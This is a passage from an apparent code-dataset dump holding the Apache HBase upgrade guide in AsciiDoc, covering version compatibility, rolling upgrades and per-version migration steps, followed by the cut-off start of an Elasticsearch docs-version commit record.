with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[upgrading]]\n= Upgrading\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nYou cannot skip major versions when upgrading. If you are upgrading from version 0.90.x to 0.94.x, you must first go from 0.90.x to 0.92.x and then go from 0.92.x to 0.94.x.\n\nNOTE: It may be possible to skip across versions -- for example go from 0.92.2 straight to 0.98.0 just following the 0.96.x upgrade instructions -- but these scenarios are untested.\n\nReview <<configuration>>, in particular <<hadoop>>.\n\n[[hbase.versioning]]\n== HBase version number and compatibility\n\nHBase has two versioning schemes, pre-1.0 and post-1.0. Both are detailed below.\n\n[[hbase.versioning.post10]]\n=== Post 1.0 versions\n\nStarting with the 1.0.0 release, HBase uses link:http:\/\/semver.org\/[Semantic Versioning] for its release versioning. In summary:\n\n.Given a version number MAJOR.MINOR.PATCH, increment the:\n* MAJOR version when you make incompatible API changes,\n* MINOR version when you add functionality in a backwards-compatible manner, and\n* PATCH version when you make backwards-compatible bug fixes.\n* Additional labels for pre-release and build metadata are available as extensions to the MAJOR.MINOR.PATCH format.\n\n[[hbase.versioning.compat]]\n.Compatibility Dimensions\nIn addition to the usual API versioning considerations HBase has other compatibility dimensions that we need to consider.\n\n.Client-Server wire protocol compatibility\n* Allows updating client and server out of sync.\n* We could only allow upgrading the server first. I.e. the server would be backward compatible to an old client, that way new APIs are OK.\n* Example: A user should be able to use an old client to connect to an upgraded cluster.\n\n.Server-Server protocol compatibility\n* Servers of different versions can co-exist in the same cluster.\n* The wire protocol between servers is compatible.\n* Workers for distributed tasks, such as replication and log splitting, can co-exist in the same cluster.\n* Dependent protocols (such as using ZK for coordination) will also not be changed.\n* Example: A user can perform a rolling upgrade.\n\n.File format compatibility\n* Support file formats backward and forward compatible\n* Example: File, ZK encoding, directory layout is upgraded automatically as part of an HBase upgrade. User can rollback to the older version and everything will continue to work.\n\n.Client API compatibility\n* Allow changing or removing existing client APIs.\n* An API needs to deprecated for a major version before we will change\/remove it.\n* Example: A user using a newly deprecated api does not need to modify application code with hbase api calls until the next major version.\n\n.Client Binary compatibility\n* Old client code can run unchanged (no recompilation needed) against new jars.\n* Example: Old compiled client code will work unchanged with the new jars.\n\n.Server-Side Limited API compatibility (taken from Hadoop)\n* Internal APIs are marked as Stable, Evolving, or Unstable\n* This implies binary compatibility for coprocessors and plugins (pluggable classes, including replication) as long as these are only using marked interfaces\/classes.\n* Example: Old compiled Coprocessor, Filter, or Plugin code will work unchanged with the new jars.\n\n.Dependency Compatibility\n* An upgrade of HBase will not require an incompatible upgrade of a dependent project, including the Java runtime.\n* Example: An upgrade of Hadoop will not invalidate any of the compatibilities guarantees we made.\n\n.Operational Compatibility\n* Metric changes\n* Behavioral changes of services\n* Web page APIs\n\n.Summary\n* A patch upgrade is a drop-in replacement. Any change that is not Java binary compatible would not be allowed.footnote:[See http:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-13.html.]\n\n* A minor upgrade requires no application\/client code modification. Ideally it would be a drop-in replacement but client code, coprocessors, filters, etc might have to be recompiled if new jars are used.\n\n* A major upgrade allows the HBase community to make breaking changes.\n\n.Compatibility Matrix footnote:[Note that this indicates what could break, not that it will break. We will\/should add specifics in our release notes.]\n[cols=\"1,1,1,1\"]\n|===\n| | Major | Minor | Patch\n|Client-Server wire Compatibility| N |Y |Y\n|Server-Server Compatibility |N |Y |Y\n|File Format Compatibility | N footnote:[comp_matrix_offline_upgrade_note,Running an offline upgrade tool without rollback might be needed. We will typically only support migrating data from major version X to major version X+1.] | Y |Y\n|Client API Compatibility | N | Y |Y\n|Client Binary Compatibility | N | N |Y\n4+|Server-Side Limited API Compatibility\n>| Stable | N | Y | Y\n>| Evolving | N |N |Y\n>| Unstable | N |N |N\n|Dependency Compatibility | N |Y |Y\n|Operational Compatibility | N |N |Y\n|===\n\n[[hbase.client.api.surface]]\n==== HBase API Surface\n\nHBase has a lot of API points, but for the compatibility matrix above, we differentiate between Client API, Limited Private API, and Private API. HBase uses a version of link:https:\/\/hadoop.apache.org\/docs\/current\/hadoop-project-dist\/hadoop-common\/Compatibility.html[Hadoop's Interface classification]. HBase's Interface classification classes can be found link:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/classification\/package-summary.html[here].\n\n* InterfaceAudience: captures the intended audience, possible values are Public (for end users and external projects), LimitedPrivate (for other Projects, Coprocessors or other plugin points), and Private (for internal use).\n* InterfaceStability: describes what types of interface changes are permitted. Possible values are Stable, Evolving, Unstable, and Deprecated.\n\n[[hbase.client.api]]\nHBase Client API::\n HBase Client API consists of all the classes or methods that are marked with InterfaceAudience.Public interface. All main classes in hbase-client and dependent modules have either InterfaceAudience.Public, InterfaceAudience.LimitedPrivate, or InterfaceAudience.Private marker. Not all classes in other modules (hbase-server, etc) have the marker. If a class is not annotated with one of these, it is assumed to be a InterfaceAudience.Private class.\n\n[[hbase.limitetprivate.api]]\nHBase LimitedPrivate API::\n LimitedPrivate annotation comes with a set of target consumers for the interfaces. Those consumers are coprocessors, phoenix, replication endpoint implemnetations or similar. At this point, HBase only guarantees source and binary compatibility for these interfaces between patch versions.\n\n[[hbase.private.api]]\nHBase Private API::\n All classes annotated with InterfaceAudience.Private or all classes that do not have the annotation are for HBase internal use only. The interfaces and method signatures can change at any point in time. If you are relying on a particular interface that is marked Private, you should open a jira to propose changing the interface to be Public or LimitedPrivate, or an interface exposed for this purpose.\n\n[[hbase.versioning.pre10]]\n=== Pre 1.0 versions\n\nBefore the semantic versioning scheme pre-1.0, HBase tracked either Hadoop's versions (0.2x) or 0.9x versions. If you are into the arcane, checkout our old wiki page on link:http:\/\/wiki.apache.org\/hadoop\/Hbase\/HBaseVersions[HBase Versioning] which tries to connect the HBase version dots. Below sections cover ONLY the releases before 1.0.\n\n[[hbase.development.series]]\n.Odd\/Even Versioning or \"Development\" Series Releases\nAhead of big releases, we have been putting up preview versions to start the feedback cycle turning-over earlier. These \"Development\" Series releases, always odd-numbered, come with no guarantees, not even regards being able to upgrade between two sequential releases (we reserve the right to break compatibility across \"Development\" Series releases). Needless to say, these releases are not for production deploys. They are a preview of what is coming in the hope that interested parties will take the release for a test drive and flag us early if we there are issues we've missed ahead of our rolling a production-worthy release.\n\nOur first \"Development\" Series was the 0.89 set that came out ahead of HBase 0.90.0. HBase 0.95 is another \"Development\" Series that portends HBase 0.96.0. 0.99.x is the last series in \"developer preview\" mode before 1.0. Afterwards, we will be using semantic versioning naming scheme (see above).\n\n[[hbase.binary.compatibility]]\n.Binary Compatibility\nWhen we say two HBase versions are compatible, we mean that the versions are wire and binary compatible. Compatible HBase versions means that clients can talk to compatible but differently versioned servers. It means too that you can just swap out the jars of one version and replace them with the jars of another, compatible version and all will just work. Unless otherwise specified, HBase point versions are (mostly) binary compatible. You can safely do rolling upgrades between binary compatible versions; i.e. across point versions: e.g. from 0.94.5 to 0.94.6. See link:[Does compatibility between versions also mean binary compatibility?] discussion on the HBase dev mailing list.\n\n[[hbase.rolling.upgrade]]\n=== Rolling Upgrades\n\nA rolling upgrade is the process by which you update the servers in your cluster a server at a time. You can rolling upgrade across HBase versions if they are binary or wire compatible. See <<hbase.rolling.restart>> for more on what this means. Coarsely, a rolling upgrade is a graceful stop each server, update the software, and then restart. You do this for each server in the cluster. Usually you upgrade the Master first and then the RegionServers. See <<rolling>> for tools that can help use the rolling upgrade process.\n\nFor example, in the below, HBase was symlinked to the actual HBase install. On upgrade, before running a rolling restart over the cluser, we changed the symlink to point at the new HBase software version and then ran\n\n[source,bash]\n----\n$ HADOOP_HOME=~\/hadoop-2.6.0-CRC-SNAPSHOT ~\/hbase\/bin\/rolling-restart.sh --config ~\/conf_hbase\n----\n\nThe rolling-restart script will first gracefully stop and restart the master, and then each of the RegionServers in turn. Because the symlink was changed, on restart the server will come up using the new HBase version. Check logs for errors as the rolling upgrade proceeds.\n\n[[hbase.rolling.restart]]\n.Rolling Upgrade Between Versions that are Binary\/Wire Compatible\nUnless otherwise specified, HBase point versions are binary compatible. You can do a <<hbase.rolling.upgrade>> between HBase point versions. For example, you can go to 0.94.6 from 0.94.5 by doing a rolling upgrade across the cluster replacing the 0.94.5 binary with a 0.94.6 binary.\n\nIn the minor version-particular sections below, we call out where the versions are wire\/protocol compatible and in this case, it is also possible to do a <<hbase.rolling.upgrade>>. For example, in <<upgrade1.0.rolling.upgrade>>, we state that it is possible to do a rolling upgrade between hbase-0.98.x and hbase-1.0.0.\n\n== Upgrade Paths\n\n[[upgrade1.0]]\n=== Upgrading from 0.98.x to 1.0.x\n\nIn this section we first note the significant changes that come in with 1.0.0 HBase and then we go over the upgrade process. Be sure to read the significant changes section with care so you avoid surprises.\n\n==== Changes of Note!\n\nIn here we list important changes that are in 1.0.0 since 0.98.x., changes you should be aware that will go into effect once you upgrade.\n\n[[zookeeper.3.4]]\n.ZooKeeper 3.4 is required in HBase 1.0.0\nSee <<zookeeper.requirements>>.\n\n[[default.ports.changed]]\n.HBase Default Ports Changed\nThe ports used by HBase changed. They used to be in the 600XX range. In HBase 1.0.0 they have been moved up out of the ephemeral port range and are 160XX instead (Master web UI was 60010 and is now 16010; the RegionServer web UI was 60030 and is now 16030, etc.). If you want to keep the old port locations, copy the port setting configs from _hbase-default.xml_ into _hbase-site.xml_, change them back to the old values from the HBase 0.98.x era, and ensure you've distributed your configurations before you restart.\n\n[[upgrade1.0.hbase.bucketcache.percentage.in.combinedcache]]\n.hbase.bucketcache.percentage.in.combinedcache configuration has been REMOVED\nYou may have made use of this configuration if you are using BucketCache. If NOT using BucketCache, this change does not effect you. Its removal means that your L1 LruBlockCache is now sized using `hfile.block.cache.size` -- i.e. the way you would size the on-heap L1 LruBlockCache if you were NOT doing BucketCache -- and the BucketCache size is not whatever the setting for `hbase.bucketcache.size` is. You may need to adjust configs to get the LruBlockCache and BucketCache sizes set to what they were in 0.98.x and previous. If you did not set this config., its default value was 0.9. If you do nothing, your BucketCache will increase in size by 10%. Your L1 LruBlockCache will become `hfile.block.cache.size` times your java heap size (`hfile.block.cache.size` is a float between 0.0 and 1.0). To read more, see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11520[HBASE-11520 Simplify offheap cache config by removing the confusing \"hbase.bucketcache.percentage.in.combinedcache\"].\n\n[[hbase-12068]]\n.If you have your own customer filters.\nSee the release notes on the issue link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12068[HBASE-12068 [Branch-1\\] Avoid need to always do KeyValueUtil#ensureKeyValue for Filter transformCell]; be sure to follow the recommendations therein.\n\n[[dlr]]\n.Distributed Log Replay\n<<distributed.log.replay>> is off by default in HBase 1.0.0. Enabling it can make a big difference improving HBase MTTR. Enable this feature if you are doing a clean stop\/start when you are upgrading. You cannot rolling upgrade to this feature (caveat if you are running on a version of HBase in excess of HBase 0.98.4 -- see link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-12577[HBASE-12577 Disable distributed log replay by default] for more).\n\n[[upgrade1.0.rolling.upgrade]]\n==== Rolling upgrade from 0.98.x to HBase 1.0.0\n.From 0.96.x to 1.0.0\nNOTE: You cannot do a <<hbase.rolling.upgrade,rolling upgrade>> from 0.96.x to 1.0.0 without first doing a rolling upgrade to 0.98.x. See comment in link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11164?focusedCommentId=14182330&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#comment-14182330[HBASE-11164 Document and test rolling updates from 0.98 -> 1.0] for the why. Also because HBase 1.0.0 enables HFile v3 by default, link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-9801[HBASE-9801 Change the default HFile version to V3], and support for HFile v3 only arrives in 0.98, this is another reason you cannot rolling upgrade from HBase 0.96.x; if the rolling upgrade stalls, the 0.96.x servers cannot open files written by the servers running the newer HBase 1.0.0 with HFile's of version 3.\n\nThere are no known issues running a <<hbase.rolling.upgrade,rolling upgrade>> from HBase 0.98.x to HBase 1.0.0.\n\n[[upgrade1.0.from.0.94]]\n==== Upgrading to 1.0 from 0.94\nYou cannot rolling upgrade from 0.94.x to 1.x.x. You must stop your cluster, install the 1.x.x software, run the migration described at <<executing.the.0.96.upgrade>> (substituting 1.x.x. wherever we make mention of 0.96.x in the section below), and then restart. Be sure to upgrade your ZooKeeper if it is a version less than the required 3.4.x.\n\n[[upgrade0.98]]\n=== Upgrading from 0.96.x to 0.98.x\nA rolling upgrade from 0.96.x to 0.98.x works. The two versions are not binary compatible.\n\nAdditional steps are required to take advantage of some of the new features of 0.98.x, including cell visibility labels, cell ACLs, and transparent server side encryption. See <<security>> for more information. Significant performance improvements include a change to the write ahead log threading model that provides higher transaction throughput under high load, reverse scanners, MapReduce over snapshot files, and striped compaction.\n\nClients and servers can run with 0.98.x and 0.96.x versions. However, applications may need to be recompiled due to changes in the Java API.\n\n=== Upgrading from 0.94.x to 0.98.x\nA rolling upgrade from 0.94.x directly to 0.98.x does not work. The upgrade path follows the same procedures as <<upgrade0.96>>. Additional steps are required to use some of the new features of 0.98.x. See <<upgrade0.98>> for an abbreviated list of these features.\n\n[[upgrade0.96]]\n=== Upgrading from 0.94.x to 0.96.x\n\n==== The \"Singularity\"\n\n.HBase 0.96.x was EOL'd, September 1st, 2014\nNOTE: Do not deploy 0.96.x Deploy at least 0.98.x. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-11642[EOL 0.96].\n\nYou will have to stop your old 0.94.x cluster completely to upgrade. If you are replicating between clusters, both clusters will have to go down to upgrade. Make sure it is a clean shutdown. The less WAL files around, the faster the upgrade will run (the upgrade will split any log files it finds in the filesystem as part of the upgrade process). All clients must be upgraded to 0.96 too.\n\nThe API has changed. You will need to recompile your code against 0.96 and you may need to adjust applications to go against new APIs (TODO: List of changes).\n\n[[executing.the.0.96.upgrade]]\n==== Executing the 0.96 Upgrade\n\n.HDFS and ZooKeeper must be up!\nNOTE: HDFS and ZooKeeper should be up and running during the upgrade process.\n\nHBase 0.96.0 comes with an upgrade script. Run\n\n[source,bash]\n----\n$ bin\/hbase upgrade\n----\nto see its usage. The script has two main modes: `-check`, and `-execute`.\n\n.check\nThe check step is run against a running 0.94 cluster. Run it from a downloaded 0.96.x binary. The check step is looking for the presence of HFile v1 files. These are unsupported in HBase 0.96.0. To have them rewritten as HFile v2 you must run a compaction.\n\nThe check step prints stats at the end of its run (grep for `\u201cResult:\u201d` in the log) printing absolute path of the tables it scanned, any HFile v1 files found, the regions containing said files (these regions will need a major compaction), and any corrupted files if found. A corrupt file is unreadable, and so is undefined (neither HFile v1 nor HFile v2).\n\nTo run the check step, run\n\n[source,bash]\n----\n$ bin\/hbase upgrade -check\n----\n\nHere is sample output:\n----\nTables Processed:\nhdfs:\/\/localhost:41020\/myHBase\/.META.\nhdfs:\/\/localhost:41020\/myHBase\/usertable\nhdfs:\/\/localhost:41020\/myHBase\/TestTable\nhdfs:\/\/localhost:41020\/myHBase\/t\n\nCount of HFileV1: 2\nHFileV1:\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/fa02dac1f38d03577bd0f7e666f12812\/family\/249450144068442524\nhdfs:\/\/localhost:41020\/myHBase\/usertable \/ecdd3eaee2d2fcf8184ac025555bb2af\/family\/249450144068442512\n\nCount of corrupted files: 1\nCorrupted Files:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\/family\/1\nCount of Regions with HFileV1: 2\nRegions to Major Compact:\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/fa02dac1f38d03577bd0f7e666f12812\nhdfs:\/\/localhost:41020\/myHBase\/usertable\/ecdd3eaee2d2fcf8184ac025555bb2af\n\nThere are some HFileV1, or corrupt files (files with incorrect major version)\n----\n\nIn the above sample output, there are two HFile v1 files in two regions, and one corrupt file. Corrupt files should probably be removed. The regions that have HFile v1s need to be major compacted. To major compact, start up the hbase shell and review how to compact an individual region. After the major compaction is done, rerun the check step and the HFile v1 files should be gone, replaced by HFile v2 instances.\n\nBy default, the check step scans the HBase root directory (defined as `hbase.rootdir` in the configuration). To scan a specific directory only, pass the `-dir` option.\n[source,bash]\n----\n$ bin\/hbase upgrade -check -dir \/myHBase\/testTable\n----\nThe above command would detect HFile v1 files in the _\/myHBase\/testTable_ directory.\n\nOnce the check step reports all the HFile v1 files have been rewritten, it is safe to proceed with the upgrade.\n\n.execute\nAfter the _check_ step shows the cluster is free of HFile v1, it is safe to proceed with the upgrade. Next is the _execute_ step. You must *SHUTDOWN YOUR 0.94.x CLUSTER* before you can run the execute step. The execute step will not run if it detects running HBase masters or RegionServers.\n\n[NOTE]\n====\nHDFS and ZooKeeper should be up and running during the upgrade process. If zookeeper is managed by HBase, then you can start zookeeper so it is available to the upgrade by running\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh start zookeeper\n----\n====\n\nThe execute upgrade step is made of three substeps.\n\n* Namespaces: HBase 0.96.0 has support for namespaces. The upgrade needs to reorder directories in the filesystem for namespaces to work.\n\n* ZNodes: All znodes are purged so that new ones can be written in their place using a new protobuf'ed format and a few are migrated in place: e.g. replication and table state znodes\n\n* WAL Log Splitting: If the 0.94.x cluster shutdown was not clean, we'll split WAL logs as part of migration before we startup on 0.96.0. This WAL splitting runs slower than the native distributed WAL splitting because it is all inside the single upgrade process (so try and get a clean shutdown of the 0.94.0 cluster if you can).\n\nTo run the _execute_ step, make sure that first you have copied HBase 0.96.0 binaries everywhere under servers and under clients. Make sure the 0.94.0 cluster is down. Then do as follows:\n[source,bash]\n----\n$ bin\/hbase upgrade -execute\n----\nHere is some sample output.\n\n----\nStarting Namespace upgrade\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=7\nMigrating table testTable to hdfs:\/\/localhost:41020\/myHBase\/.data\/default\/testTable\n.....\nCreated version file at hdfs:\/\/localhost:41020\/myHBase with version=8\nSuccessfully completed NameSpace upgrade.\nStarting Znode upgrade\n.....\nSuccessfully completed Znode upgrade\n\nStarting Log splitting\n...\nSuccessfully completed Log splitting\n----\n\nIf the output from the execute step looks good, stop the zookeeper instance you started to do the upgrade:\n[source,bash]\n----\n$ .\/hbase\/bin\/hbase-daemon.sh stop zookeeper\n----\nNow start up hbase-0.96.0.\n\n[[s096.migration.troubleshooting]]\n=== Troubleshooting\n\n[[s096.migration.troubleshooting.old.client]]\n.Old Client connecting to 0.96 cluster\nIt will fail with an exception like the below. Upgrade.\n----\n17:22:15 Exception in thread \"main\" java.lang.IllegalArgumentException: Not a host:port pair: PBUF\n17:22:15 *\n17:22:15 api-compat-8.ent.cloudera.com \ufffd\ufffd \ufffd\ufffd\ufffd(\n17:22:15 at org.apache.hadoop.hbase.util.Addressing.parseHostname(Addressing.java:60)\n17:22:15 at org.apache.hadoop.hbase.ServerName.&init>(ServerName.java:101)\n17:22:15 at org.apache.hadoop.hbase.ServerName.parseVersionedServerName(ServerName.java:283)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.bytesToServerName(MasterAddressTracker.java:77)\n17:22:15 at org.apache.hadoop.hbase.MasterAddressTracker.getMasterAddress(MasterAddressTracker.java:61)\n17:22:15 at org.apache.hadoop.hbase.client.HConnectionManager$HConnectionImplementation.getMaster(HConnectionManager.java:703)\n17:22:15 at org.apache.hadoop.hbase.client.HBaseAdmin.&init>(HBaseAdmin.java:126)\n17:22:15 at Client_4_3_0.setup(Client_4_3_0.java:716)\n17:22:15 at Client_4_3_0.main(Client_4_3_0.java:63)\n----\n\n==== Upgrading `META` to use Protocol Buffers (Protobuf)\n\nWhen you upgrade from versions prior to 0.96, `META` needs to be converted to use protocol buffers. This is controlled by the configuration option `hbase.MetaMigrationConvertingToPB`, which is set to `true` by default. Therefore, by default, no action is required on your part.\n\nThe migration is a one-time event. However, every time your cluster starts, `META` is scanned to ensure that it does not need to be converted. If you have a very large number of regions, this scan can take a long time. Starting in 0.98.5, you can set `hbase.MetaMigrationConvertingToPB` to `false` in _hbase-site.xml_, to disable this start-up scan. This should be considered an expert-level setting.\n\n[[upgrade0.94]]\n=== Upgrading from 0.92.x to 0.94.x\nWe used to think that 0.92 and 0.94 were interface compatible and that you can do a rolling upgrade between these versions but then we figured that link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5357[HBASE-5357 Use builder pattern in HColumnDescriptor] changed method signatures so rather than return `void` they instead return `HColumnDescriptor`. This will throw`java.lang.NoSuchMethodError: org.apache.hadoop.hbase.HColumnDescriptor.setMaxVersions(I)V` so 0.92 and 0.94 are NOT compatible. You cannot do a rolling upgrade between them.\n\n[[upgrade0.92]]\n=== Upgrading from 0.90.x to 0.92.x\n==== Upgrade Guide\nYou will find that 0.92.0 runs a little differently to 0.90.x releases. Here are a few things to watch out for upgrading from 0.90.x to 0.92.0.\n\n.tl:dr\n[NOTE]\n====\nThese are the important things to know before upgrading.\n. Once you upgrade, you can\u2019t go back.\n\n. MSLAB is on by default. Watch that heap usage if you have a lot of regions.\n\n. Distributed Log Splitting is on by default. It should make RegionServer failover faster.\n\n. There\u2019s a separate tarball for security.\n\n. If `-XX:MaxDirectMemorySize` is set in your _hbase-env.sh_, it\u2019s going to enable the experimental off-heap cache (You may not want this).\n====\n\n.You can\u2019t go back!\nTo move to 0.92.0, all you need to do is shutdown your cluster, replace your HBase 0.90.x with HBase 0.92.0 binaries (be sure you clear out all 0.90.x instances) and restart (You cannot do a rolling restart from 0.90.x to 0.92.x -- you must restart). On startup, the `.META.` table content is rewritten removing the table schema from the `info:regioninfo` column. Also, any flushes done post first startup will write out data in the new 0.92.0 file format, <<hfilev2>>. This means you cannot go back to 0.90.x once you\u2019ve started HBase 0.92.0 over your HBase data directory.\n\n.MSLAB is ON by default\nIn 0.92.0, the `<<hbase.hregion.memstore.mslab.enabled,hbase.hregion.memstore.mslab.enabled>>` flag is set to `true` (See <<gcpause>>). In 0.90.x it was false. When it is enabled, memstores will step allocate memory in MSLAB 2MB chunks even if the memstore has zero or just a few small elements. This is fine usually but if you had lots of regions per RegionServer in a 0.90.x cluster (and MSLAB was off), you may find yourself OOME'ing on upgrade because the `thousands of regions * number of column families * 2MB MSLAB` (at a minimum) puts your heap over the top. Set `hbase.hregion.memstore.mslab.enabled` to `false` or set the MSLAB size down from 2MB by setting `hbase.hregion.memstore.mslab.chunksize` to something less.\n\n[[dls]]\n.Distributed Log Splitting is on by default\nPrevious, WAL logs on crash were split by the Master alone. In 0.92.0, log splitting is done by the cluster (See link:https:\/\/issues.apache.org\/jira\/browse\/hbase-1364[HBASE-1364 [performance\\] Distributed splitting of regionserver commit logs] or see the blog post link:http:\/\/blog.cloudera.com\/blog\/2012\/07\/hbase-log-splitting\/[Apache HBase Log Splitting]). This should cut down significantly on the amount of time it takes splitting logs and getting regions back online again.\n\n.Memory accounting is different now\nIn 0.92.0, <<hfilev2>> indices and bloom filters take up residence in the same LRU used caching blocks that come from the filesystem. In 0.90.x, the HFile v1 indices lived outside of the LRU so they took up space even if the index was on a \u2018cold\u2019 file, one that wasn\u2019t being actively used. With the indices now in the LRU, you may find you have less space for block caching. Adjust your block cache accordingly. See the <<block.cache>> for more detail. The block size default size has been changed in 0.92.0 from 0.2 (20 percent of heap) to 0.25.\n\n.On the Hadoop version to use\nRun 0.92.0 on Hadoop 1.0.x (or CDH3u3). The performance benefits are worth making the move. Otherwise, our Hadoop prescription is as it has been; you need an Hadoop that supports a working sync. See <<hadoop>>.\n\nIf running on Hadoop 1.0.x (or CDH3u3), enable local read. See link:http:\/\/files.meetup.com\/1350427\/hug_ebay_jdcryans.pdf[Practical Caching] presentation for ruminations on the performance benefits \u2018going local\u2019 (and for how to enable local reads).\n\n.HBase 0.92.0 ships with ZooKeeper 3.4.2\nIf you can, upgrade your ZooKeeper. If you can\u2019t, 3.4.2 clients should work against 3.3.X ensembles (HBase makes use of 3.4.2 API).\n\n.Online alter is off by default\nIn 0.92.0, we\u2019ve added an experimental online schema alter facility (See <<hbase.online.schema.update.enable,hbase.online.schema.update.enable>>). It's off by default. Enable it at your own risk. Online alter and splitting tables do not play well together so be sure your cluster quiescent using this feature (for now).\n\n.WebUI\nThe web UI has had a few additions made in 0.92.0. It now shows a list of the regions currently transitioning, recent compactions\/flushes, and a process list of running processes (usually empty if all is well and requests are being handled promptly). Other additions including requests by region, a debugging servlet dump, etc.\n\n.Security tarball\nWe now ship with two tarballs; secure and insecure HBase. Documentation on how to setup a secure HBase is on the way.\n\n.Changes in HBase replication\n0.92.0 adds two new features: multi-slave and multi-master replication. The way to enable this is the same as adding a new peer, so in order to have multi-master you would just run add_peer for each cluster that acts as a master to the other slave clusters. Collisions are handled at the timestamp level which may or may not be what you want, this needs to be evaluated on a per use case basis. Replication is still experimental in 0.92 and is disabled by default, run it at your own risk.\n\n.RegionServer now aborts if OOME\nIf an OOME, we now have the JVM kill -9 the RegionServer process so it goes down fast. Previous, a RegionServer might stick around after incurring an OOME limping along in some wounded state. To disable this facility, and recommend you leave it in place, you\u2019d need to edit the bin\/hbase file. Look for the addition of the -XX:OnOutOfMemoryError=\"kill -9 %p\" arguments (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4769[HBASE-4769 - \u2018Abort RegionServer Immediately on OOME\u2019]).\n\n.HFile v2 and the \u201cBigger, Fewer\u201d Tendency\n0.92.0 stores data in a new format, <<hfilev2>>. As HBase runs, it will move all your data from HFile v1 to HFile v2 format. This auto-migration will run in the background as flushes and compactions run. HFile v2 allows HBase run with larger regions\/files. In fact, we encourage that all HBasers going forward tend toward Facebook axiom #1, run with larger, fewer regions. If you have lots of regions now -- more than 100s per host -- you should look into setting your region size up after you move to 0.92.0 (In 0.92.0, default size is now 1G, up from 256M), and then running online merge tool (See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-1621[HBASE-1621 merge tool should work on online cluster, but disabled table]).\n\n[[upgrade0.90]]\n=== Upgrading to HBase 0.90.x from 0.20.x or 0.89.x\nThis version of 0.90.x HBase can be started on data written by HBase 0.20.x or HBase 0.89.x. There is no need of a migration step. HBase 0.89.x and 0.90.x does write out the name of region directories differently -- it names them with a md5 hash of the region name rather than a jenkins hash -- so this means that once started, there is no going back to HBase 0.20.x.\n\nBe sure to remove the _hbase-default.xml_ from your _conf_ directory on upgrade. A 0.20.x version of this file will have sub-optimal configurations for 0.90.x HBase. The _hbase-default.xml_ file is now bundled into the HBase jar and read from there. If you would like to review the content of this file, see it in the src tree at _src\/main\/resources\/hbase-default.xml_ or see <<hbase_default_configurations>>.\n\nFinally, if upgrading from 0.20.x, check your .META. schema in the shell. In the past we would recommend that users run with a 16kb MEMSTORE_FLUSHSIZE. Run\n----\nhbase> scan '-ROOT-'\n----\nin the shell. This will output the current `.META.` schema. Check `MEMSTORE_FLUSHSIZE` size. Is it 16kb (16384)? If so, you will need to change this (The 'normal'\/default value is 64MB (67108864)). Run the script `bin\/set_meta_memstore_size.rb`. This will make the necessary edit to your `.META.` schema. Failure to run this change will make for a slow cluster. See link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-3499[HBASE-3499 Users upgrading to 0.90.0 need to have their .META. table updated with the right MEMSTORE_SIZE].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9df539988a722cbcf1038331a9cef06d9cb28c07","subject":"Fix master version in docs","message":"Fix master version in docs\n\nThe docs are versioned as 8.0.0-alpha1 yet we are not currently\npublishing 8.0.0-alpha1 snapshots, instead 8.0.0 snapshots. We will only\nlater qualify designated builds as 8.0.0-alpha1 at which point the docs\nversion can be updated to reflect that. This commit updates the docs\nversions to 8.0.0.\n\nCloses #41941\n","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/Versions.asciidoc","new_file":"docs\/Versions.asciidoc","new_contents":":version: 8.0.0\n\/\/\/\/\nbare_version never includes -alpha or -beta\n\/\/\/\/\n:bare_version: 8.0.0\n:major-version: 8.x\n:prev-major-version: 7.x\n:lucene_version: 8.1.0\n:lucene_version_path: 8_1_0\n:branch: master\n:jdk: 11.0.2\n:jdk_major: 11\n:build_flavor: default\n:build_type: tar\n\n\/\/\/\/\/\/\/\/\/\/\nrelease-state can be: released | prerelease | unreleased\n\/\/\/\/\/\/\/\/\/\/\n\n:release-state: 